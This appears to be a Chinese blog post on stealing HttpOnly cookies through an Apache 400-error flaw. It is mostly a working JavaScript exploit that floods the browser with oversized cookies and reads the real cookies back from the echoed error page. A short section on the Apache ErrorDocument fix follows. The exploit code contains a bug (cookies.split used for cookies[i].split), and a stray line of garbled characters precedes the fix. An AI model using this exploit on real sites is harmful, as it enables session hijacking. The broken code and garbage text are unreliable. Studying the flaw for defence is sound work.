很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的httponly属性。
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
/**
 * Sets or expires ten cookies named "xss0" … "xss9" on the current origin.
 *
 * With `good` falsy, each cookie gets an 819-character value, so the
 * Cookie header of the next request becomes very large; makeRequest relies
 * on the server rejecting that request with a 400. With `good` truthy, the
 * same ten cookies are expired again so the header returns to normal.
 *
 * @param {boolean} [good] - truthy to expire the cookies, falsy to set them
 */
function setCookies (good) {
  // Construct string for cookie value
  var str = "";
  for (var i=0; i< 819; i++) {
    str += "x";
  }
  // Set cookies
  for (i = 0; i < 10; i++) {
    // Expire evil cookie (expiry one millisecond in the past)
    if (good) {
      var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
    }
    // Set evil cookie
    else {
      var cookie = "xss"+i+"="+str+";path=/";
    }
    document.cookie = cookie;
  }
}
/**
 * Plants the oversized cookies, issues a GET to "/", and reads the browser's
 * cookies back out of the server's 400 error body.
 *
 * Works only against a server (Apache, per the text below) whose 400 page
 * echoes the offending request headers inside a <pre> block; a custom
 * ErrorDocument 400 or an upgraded server removes that echo. The collected
 * cookies are shown with alert().
 */
function makeRequest() {
  setCookies();
  /**
   * XHR readyState handler. On a finished 400 response it extracts the
   * echoed Cookie header from the <pre> body, strips the planted xssN
   * cookies, and collects the remaining name=value pairs into cookie_dict.
   */
  function parseCookies () {
    var cookie_dict = {};
    // Only react on 400 status
    if (xhr.readyState === 4 && xhr.status === 400) {
      // Replace newlines and match <pre> content
      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
      if (content.length) {
        // Remove Cookie: prefix
        content = content[1].replace("Cookie: ", "");
        // Drop the planted xssN cookies, then split the rest on ';'
        var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
        // Add cookies to object
        for (var i=0; i<cookies.length; i++) {
          var s_c = cookies.split('=',2);
          cookie_dict[s_c[0]] = s_c[1];
        }
      }
      // Unset malicious cookies
      setCookies(true);
      alert(JSON.stringify(cookie_dict));
    }
  }
  // Make XHR request
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Entry point: plant the cookies, request "/", and read them back from the 400 page.
makeRequest();
你就能看见华丽丽的400错误包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
% Y1 i s2 n: ^! F9 F修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message 输出一个简单生硬的错误代码信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容。
Apache配置:
ErrorDocument 400 "security test"
当然,升级apache到最新版本也可:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html